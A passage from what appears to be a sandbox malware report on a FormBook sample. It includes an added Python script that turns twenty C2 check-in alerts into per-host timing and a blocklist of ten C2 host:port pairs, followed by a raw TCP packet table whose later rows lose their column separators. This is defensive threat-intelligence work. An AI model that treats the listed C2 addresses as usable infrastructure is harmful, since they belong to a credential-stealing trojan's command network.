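All twenty alerts fire on the same rule (SID 2855464) and, read in time order, show the sample contacting ten hosts in turn, two POSTs about 2.5 seconds apart per host and a pause of 10 to 30 seconds before the next host. The script below is an example added here, not part of the Joe Sandbox report: it takes the alert rows above, re-keyed into a '|'-separated line format chosen for this example, and derives what an analyst wants from them: the per-destination hit count, the intra-host and host-to-host timing, a check that the sequence never returns to an earlier host (on the assumption that the sample walks its C2 list sequentially, which is what the timestamps suggest rather than something the report states), and a host:port IOC list for blocking. The only input is the page's own alert data; nothing is fetched.

```python
from collections import defaultdict
from datetime import datetime

# The 20 alert rows from the table above, one per line as
# timestamp|protocol|SID|message|src port|dst port|src IP|dst IP (values exactly as reported).
ALERT_ROWS = """\
07/04/24-16:52:52.254180|TCP|2855464|ETPRO TROJAN FormBook CnC Checkin (POST) M3|49705|80|192.168.2.7|217.160.0.106
07/04/24-16:52:54.789097|TCP|2855464|ETPRO TROJAN FormBook CnC Checkin (POST) M3|49706|80|192.168.2.7|217.160.0.106
07/04/24-16:53:22.021315|TCP|2855464|ETPRO TROJAN FormBook CnC Checkin (POST) M3|49712|80|192.168.2.7|208.91.197.27
07/04/24-16:53:24.553352|TCP|2855464|ETPRO TROJAN FormBook CnC Checkin (POST) M3|49713|80|192.168.2.7|208.91.197.27
07/04/24-16:53:44.361554|TCP|2855464|ETPRO TROJAN FormBook CnC Checkin (POST) M3|49716|80|192.168.2.7|43.252.167.188
07/04/24-16:53:46.900097|TCP|2855464|ETPRO TROJAN FormBook CnC Checkin (POST) M3|49717|80|192.168.2.7|43.252.167.188
07/04/24-16:53:58.144607|TCP|2855464|ETPRO TROJAN FormBook CnC Checkin (POST) M3|49720|80|192.168.2.7|194.9.94.85
07/04/24-16:54:00.682084|TCP|2855464|ETPRO TROJAN FormBook CnC Checkin (POST) M3|49721|80|192.168.2.7|194.9.94.85
07/04/24-16:54:12.061387|TCP|2855464|ETPRO TROJAN FormBook CnC Checkin (POST) M3|49724|80|192.168.2.7|23.251.54.212
07/04/24-16:54:14.588408|TCP|2855464|ETPRO TROJAN FormBook CnC Checkin (POST) M3|49725|80|192.168.2.7|23.251.54.212
07/04/24-16:54:46.311846|TCP|2855464|ETPRO TROJAN FormBook CnC Checkin (POST) M3|49728|80|192.168.2.7|199.192.19.19
07/04/24-16:54:48.852255|TCP|2855464|ETPRO TROJAN FormBook CnC Checkin (POST) M3|49729|80|192.168.2.7|199.192.19.19
07/04/24-16:54:59.779589|TCP|2855464|ETPRO TROJAN FormBook CnC Checkin (POST) M3|49732|80|192.168.2.7|213.145.228.16
07/04/24-16:55:02.327495|TCP|2855464|ETPRO TROJAN FormBook CnC Checkin (POST) M3|49733|80|192.168.2.7|213.145.228.16
07/04/24-16:55:13.231476|TCP|2855464|ETPRO TROJAN FormBook CnC Checkin (POST) M3|49736|80|192.168.2.7|91.195.240.19
07/04/24-16:55:15.777514|TCP|2855464|ETPRO TROJAN FormBook CnC Checkin (POST) M3|49737|80|192.168.2.7|91.195.240.19
07/04/24-16:55:26.621590|TCP|2855464|ETPRO TROJAN FormBook CnC Checkin (POST) M3|49740|80|192.168.2.7|194.58.112.174
07/04/24-16:55:29.149800|TCP|2855464|ETPRO TROJAN FormBook CnC Checkin (POST) M3|49741|80|192.168.2.7|194.58.112.174
07/04/24-16:55:40.027987|TCP|2855464|ETPRO TROJAN FormBook CnC Checkin (POST) M3|49744|80|192.168.2.7|172.67.210.102
07/04/24-16:55:42.557594|TCP|2855464|ETPRO TROJAN FormBook CnC Checkin (POST) M3|49745|80|192.168.2.7|172.67.210.102
"""


def parse_alerts(text: str) -> list:
    """One dict per alert, sorted by timestamp (the report lists them unsorted)."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, proto, sid, msg, sport, dport, src, dst = line.split("|")
        rows.append({"ts": datetime.strptime(ts, "%m/%d/%y-%H:%M:%S.%f"), "proto": proto,
                     "sid": int(sid), "msg": msg, "sport": int(sport), "dport": int(dport),
                     "src": src, "dst": dst})
    return sorted(rows, key=lambda r: r["ts"])


def c2_summary(rows: list) -> list:
    """Per destination, in order of first contact: hit count, ports, largest gap between
    consecutive hits on that host, and the pause since the previous host's last hit."""
    by_dst = defaultdict(list)
    for r in rows:
        by_dst[r["dst"]].append(r)
    summary, prev_last = [], None
    for dst, hits in sorted(by_dst.items(), key=lambda kv: kv[1][0]["ts"]):
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(hits, hits[1:])]
        summary.append({
            "dst": dst,
            "dports": sorted({h["dport"] for h in hits}),
            "hits": len(hits),
            "first": hits[0]["ts"], "last": hits[-1]["ts"],
            "max_gap_s": max(gaps, default=0.0),
            "since_prev_host_s": None if prev_last is None
                                 else (hits[0]["ts"] - prev_last).total_seconds(),
            "sids": sorted({h["sid"] for h in hits}),
        })
        prev_last = hits[-1]["ts"]
    return summary


def hosts_interleave(rows: list) -> bool:
    """True if the stream returns to a destination it already left; a sequential
    walk through a C2 list (the assumption here) never does."""
    seen, last = set(), None
    for r in rows:
        if r["dst"] != last and r["dst"] in seen:
            return True
        seen.add(r["dst"])
        last = r["dst"]
    return False


def iocs(summary: list) -> list:
    """host:port pairs for a blocklist, in first-contact order."""
    return [f"{s['dst']}:{p}" for s in summary for p in s["dports"]]


if __name__ == "__main__":
    rows = parse_alerts(ALERT_ROWS)
    for s in c2_summary(rows):
        pause = "-" if s["since_prev_host_s"] is None else f"{s['since_prev_host_s']:.1f}s"
        print(f"{s['dst']:<16} hits={s['hits']} intra={s['max_gap_s']:.2f}s after_prev={pause} sids={s['sids']}")
    print("interleaved:", hosts_interleave(rows))
    print("IOCs:", ", ".join(iocs(c2_summary(rows))))
```

The timing columns are the useful output: a host that receives more than the two expected hits, or a return to an earlier host, would break the pattern and deserves a closer look in the packet list; the IOC list is the set of 10 host:port pairs, and the first flow in the TCP table below (49704 to 5.44.111.162) is outside it, so it must be judged from its own payload rather than from the alerts.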
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 4, 2024 16:52:36.465002060 CEST | 49704 | 80 | 192.168.2.7 | 5.44.111.162
Jul 4, 2024 16:52:36.471350908 CEST | 80 | 49704 | 5.44.111.162 | 192.168.2.7
Jul 4, 2024 16:52:36.471462011 CEST | 49704 | 80 | 192.168.2.7 | 5.44.111.162
Jul 4, 2024 16:52:36.477865934 CEST | 49704 | 80 | 192.168.2.7 | 5.44.111.162
Jul 4, 2024 16:52:36.483901024 CEST | 80 | 49704 | 5.44.111.162 | 192.168.2.7
Jul 4, 2024 16:52:37.133348942 CEST | 80 | 49704 | 5.44.111.162 | 192.168.2.7
Jul 4, 2024 16:52:37.133367062 CEST | 80 | 49704 | 5.44.111.162 | 192.168.2.7
Jul 4, 2024 16:52:37.133616924 CEST | 49704 | 80 | 192.168.2.7 | 5.44.111.162
Jul 4, 2024 16:52:37.136322021 CEST | 49704 | 80 | 192.168.2.7 | 5.44.111.162
Jul 4, 2024 16:52:37.141473055 CEST | 80 | 49704 | 5.44.111.162 | 192.168.2.7
Jul 4, 2024 16:52:52.244966984 CEST | 49705 | 80 | 192.168.2.7 | 217.160.0.106
Jul 4, 2024 16:52:52.252361059 CEST | 80 | 49705 | 217.160.0.106 | 192.168.2.7
Jul 4, 2024 16:52:52.252446890 CEST | 49705 | 80 | 192.168.2.7 | 217.160.0.106
Jul 4, 2024 16:52:52.254179955 CEST | 49705 | 80 | 192.168.2.7 | 217.160.0.106
Jul 4, 2024 16:52:52.259499073 CEST | 80 | 49705 | 217.160.0.106 | 192.168.2.7
Jul 4, 2024 16:52:52.932354927 CEST | 80 | 49705 | 217.160.0.106 | 192.168.2.7
Jul 4, 2024 16:52:52.932467937 CEST | 80 | 49705 | 217.160.0.106 | 192.168.2.7
Jul 4, 2024 16:52:52.932554007 CEST | 49705 | 80 | 192.168.2.7 | 217.160.0.106
Jul 4, 2024 16:52:53.762443066 CEST | 49705 | 80 | 192.168.2.7 | 217.160.0.106
Jul 4, 2024 16:52:54.781671047 CEST | 49706 | 80 | 192.168.2.7 | 217.160.0.106
Jul 4, 2024 16:52:54.786855936 CEST | 80 | 49706 | 217.160.0.106 | 192.168.2.7
Jul 4, 2024 16:52:54.786973953 CEST | 49706 | 80 | 192.168.2.7 | 217.160.0.106
Jul 4, 2024 16:52:54.789097071 CEST | 49706 | 80 | 192.168.2.7 | 217.160.0.106
Jul 4, 2024 16:52:54.793920994 CEST | 80 | 49706 | 217.160.0.106 | 192.168.2.7
Jul 4, 2024 16:52:55.473630905 CEST | 80 | 49706 | 217.160.0.106 | 192.168.2.7
Jul 4, 2024 16:52:55.473764896 CEST | 80 | 49706 | 217.160.0.106 | 192.168.2.7
Jul 4, 2024 16:52:55.473851919 CEST | 49706 | 80 | 192.168.2.7 | 217.160.0.106
Jul 4, 2024 16:52:56.293751001 CEST | 49706 | 80 | 192.168.2.7 | 217.160.0.106
Jul 4, 2024 16:52:57.313131094 CEST | 49707 | 80 | 192.168.2.7 | 217.160.0.106
Jul 4, 2024 16:52:57.318068027 CEST | 80 | 49707 | 217.160.0.106 | 192.168.2.7
Jul 4, 2024 16:52:57.318306923 CEST | 49707 | 80 | 192.168.2.7 | 217.160.0.106
Jul 4, 2024 16:52:57.320303917 CEST | 49707 | 80 | 192.168.2.7 | 217.160.0.106
Jul 4, 2024 16:52:57.325167894 CEST | 80 | 49707 | 217.160.0.106 | 192.168.2.7
Jul 4, 2024 16:52:57.325217962 CEST | 80 | 49707 | 217.160.0.106 | 192.168.2.7
Jul 4, 2024 16:52:58.071453094 CEST | 80 | 49707 | 217.160.0.106 | 192.168.2.7
Jul 4, 2024 16:52:58.071587086 CEST | 80 | 49707 | 217.160.0.106 | 192.168.2.7
Jul 4, 2024 16:52:58.071641922 CEST | 49707 | 80 | 192.168.2.7 | 217.160.0.106
Jul 4, 2024 16:52:58.824764967 CEST | 49707 | 80 | 192.168.2.7 | 217.160.0.106
Jul 4, 2024 16:52:59.846560955 CEST | 49708 | 80 | 192.168.2.7 | 217.160.0.106
Jul 4, 2024 16:52:59.854441881 CEST | 80 | 49708 | 217.160.0.106 | 192.168.2.7
Jul 4, 2024 16:52:59.854515076 CEST | 49708 | 80 | 192.168.2.7 | 217.160.0.106
Jul 4, 2024 16:52:59.856486082 CEST | 49708 | 80 | 192.168.2.7 | 217.160.0.106
Jul 4, 2024 16:52:59.861231089 CEST | 80 | 49708 | 217.160.0.106 | 192.168.2.7
Jul 4, 2024 16:53:00.517497063 CEST | 80 | 49708 | 217.160.0.106 | 192.168.2.7
Jul 4, 2024 16:53:00.531868935 CEST | 80 | 49708 | 217.160.0.106 | 192.168.2.7
Jul 4, 2024 16:53:00.531964064 CEST | 49708 | 80 | 192.168.2.7 | 217.160.0.106
Jul 4, 2024 16:53:00.532752037 CEST | 49708 | 80 | 192.168.2.7 | 217.160.0.106
Jul 4, 2024 16:53:00.537544012 CEST | 80 | 49708 | 217.160.0.106 | 192.168.2.7
Jul 4, 2024 16:53:22.013622999 CEST | 49712 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:22.019160986 CEST | 80 | 49712 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:22.019243002 CEST | 49712 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:22.021315098 CEST | 49712 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:22.026168108 CEST | 80 | 49712 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:22.491641045 CEST | 80 | 49712 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:22.491702080 CEST | 49712 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:23.528386116 CEST | 49712 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:23.534238100 CEST | 80 | 49712 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:24.546407938 CEST | 49713 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:24.551314116 CEST | 80 | 49713 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:24.551455975 CEST | 49713 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:24.553352118 CEST | 49713 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:24.558173895 CEST | 80 | 49713 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:25.049664021 CEST | 80 | 49713 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:25.049922943 CEST | 49713 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:26.059432030 CEST | 49713 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:26.064424992 CEST | 80 | 49713 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:27.079040051 CEST | 49714 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:27.083997965 CEST | 80 | 49714 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:27.084135056 CEST | 49714 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:27.088635921 CEST | 49714 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:27.093753099 CEST | 80 | 49714 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:27.094259024 CEST | 80 | 49714 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:27.575026989 CEST | 80 | 49714 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:27.575084925 CEST | 49714 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:28.590739965 CEST | 49714 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:28.595709085 CEST | 80 | 49714 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:29.609603882 CEST | 49715 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:29.614631891 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:29.614717960 CEST | 49715 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:29.616545916 CEST | 49715 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:29.621470928 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.541063070 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.541084051 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.541098118 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.541125059 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.541136026 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.541141033 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.541145086 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.541151047 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.541239023 CEST | 49715 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:30.541380882 CEST | 49715 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:30.541419983 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.541433096 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.541490078 CEST | 49715 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:30.546256065 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.546293020 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.546305895 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.546488047 CEST | 49715 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:30.629441023 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.629461050 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.629478931 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.629489899 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.629501104 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.629627943 CEST | 49715 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:30.629760981 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.629798889 CEST | 49715 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:30.629827023 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.629837990 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.629869938 CEST | 49715 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:30.629965067 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.629975080 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.630019903 CEST | 49715 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:30.630587101 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.630664110 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.630673885 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.630713940 CEST | 49715 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:30.630913019 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.630923033 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.630949974 CEST | 49715 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:30.631442070 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.631491899 CEST | 49715 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:30.631504059 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.631513119 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.631550074 CEST | 49715 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:30.632945061 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.633065939 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.633088112 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.633099079 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.633111000 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.633110046 CEST | 49715 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:30.633128881 CEST | 49715 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:30.634509087 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.634547949 CEST | 49715 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:30.634553909 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.634565115 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:30.634599924 CEST | 49715 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:30.638286114 CEST | 49715 | 80 | 192.168.2.7 | 208.91.197.27
Jul 4, 2024 16:53:30.643855095 CEST | 80 | 49715 | 208.91.197.27 | 192.168.2.7
Jul 4, 2024 16:53:44.354590893 CEST | 49716 | 80 | 192.168.2.7 | 43.252.167.188
Jul 4, 2024 16:53:44.359443903 CEST | 80 | 49716 | 43.252.167.188 | 192.168.2.7
Jul 4, 2024 16:53:44.359596968 CEST | 49716 | 80 | 192.168.2.7 | 43.252.167.188
Jul 4, 2024 16:53:44.361553907 CEST | 49716 | 80 | 192.168.2.7 | 43.252.167.188
Jul 4, 2024 16:53:44.366379976 CEST | 80 | 49716 | 43.252.167.188 | 192.168.2.7
Jul 4, 2024 16:53:45.284420013 CEST | 80 | 49716 | 43.252.167.188 | 192.168.2.7
Jul 4, 2024 16:53:45.284442902 CEST | 80 | 49716 | 43.252.167.188 | 192.168.2.7
Jul 4, 2024 16:53:45.284523964 CEST | 49716 | 80 | 192.168.2.7 | 43.252.167.188
Jul 4, 2024 16:53:45.872037888 CEST | 49716 | 80 | 192.168.2.7 | 43.252.167.188
Jul 4, 2024 16:53:46.892322063 CEST | 49717 | 80 | 192.168.2.7 | 43.252.167.188
Jul 4, 2024 16:53:46.897401094 CEST | 80 | 49717 | 43.252.167.188 | 192.168.2.7
Jul 4, 2024 16:53:46.897479057 CEST | 49717 | 80 | 192.168.2.7 | 43.252.167.188
Jul 4, 2024 16:53:46.900096893 CEST | 49717 | 80 | 192.168.2.7 | 43.252.167.188
Jul 4, 2024 16:53:46.904877901 CEST | 80 | 49717 | 43.252.167.188 | 192.168.2.7
Jul 4, 2024 16:53:47.793884993 CEST | 80 | 49717 | 43.252.167.188 | 192.168.2.7
Jul 4, 2024 16:53:47.794096947 CEST | 80 | 49717 | 43.252.167.188 | 192.168.2.7
Jul 4, 2024 16:53:47.794209957 CEST | 49717 | 80 | 192.168.2.7 | 43.252.167.188
                                          Jul 4, 2024 16:53:48.428813934 CEST4971780192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:49.442385912 CEST4971880192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:49.447803974 CEST804971843.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:49.447890997 CEST4971880192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:49.450368881 CEST4971880192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:49.456132889 CEST804971843.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:49.456271887 CEST804971843.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:50.636241913 CEST804971843.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:50.636265039 CEST804971843.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:50.636317968 CEST4971880192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:50.965754032 CEST4971880192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:51.984478951 CEST4971980192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:51.989646912 CEST804971943.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:51.991595030 CEST4971980192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:51.995414972 CEST4971980192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:52.001710892 CEST804971943.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:52.998866081 CEST804971943.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:52.999054909 CEST804971943.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:52.999113083 CEST4971980192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:53.002871037 CEST4971980192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:53.007900000 CEST804971943.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:58.137664080 CEST4972080192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:53:58.142551899 CEST8049720194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:53:58.142697096 CEST4972080192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:53:58.144607067 CEST4972080192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:53:58.150125027 CEST8049720194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:53:58.815129995 CEST8049720194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:53:58.815161943 CEST8049720194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:53:58.815172911 CEST8049720194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:53:58.815186024 CEST8049720194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:53:58.815197945 CEST8049720194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:53:58.815210104 CEST8049720194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:53:58.815232992 CEST4972080192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:53:58.815334082 CEST8049720194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:53:58.815340042 CEST4972080192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:53:58.815340042 CEST4972080192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:53:58.815346003 CEST8049720194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:53:58.815402031 CEST4972080192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:53:59.653225899 CEST4972080192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:00.674647093 CEST4972180192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:00.679639101 CEST8049721194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:00.679709911 CEST4972180192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:00.682084084 CEST4972180192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:00.686872005 CEST8049721194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:01.344336987 CEST8049721194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:01.344357014 CEST8049721194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:01.344368935 CEST8049721194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:01.344461918 CEST8049721194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:01.344465017 CEST4972180192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:01.344474077 CEST8049721194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:01.344489098 CEST8049721194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:01.344507933 CEST8049721194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:01.344511986 CEST4972180192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:01.344540119 CEST4972180192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:01.344615936 CEST4972180192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:02.184408903 CEST4972180192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:03.210362911 CEST4972280192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:03.215398073 CEST8049722194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:03.215548038 CEST4972280192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:03.217961073 CEST4972280192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:03.223885059 CEST8049722194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:03.223900080 CEST8049722194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:03.888307095 CEST8049722194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:03.888339043 CEST8049722194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:03.888351917 CEST8049722194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:03.888365030 CEST8049722194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:03.888379097 CEST8049722194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:03.888441086 CEST8049722194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:03.888451099 CEST8049722194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:03.888499022 CEST4972280192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:03.888499022 CEST4972280192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:03.888559103 CEST4972280192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:04.731409073 CEST4972280192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:05.751576900 CEST4972380192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:05.756495953 CEST8049723194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:05.761291981 CEST4972380192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:05.761291981 CEST4972380192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:05.766089916 CEST8049723194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:06.432868004 CEST8049723194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:06.432897091 CEST8049723194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:06.432912111 CEST8049723194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:06.432948112 CEST8049723194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:06.432966948 CEST8049723194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:06.432981968 CEST8049723194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:06.433087111 CEST4972380192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:06.433087111 CEST4972380192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:06.441382885 CEST4972380192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:06.446306944 CEST8049723194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:12.050554037 CEST4972480192.168.2.723.251.54.212
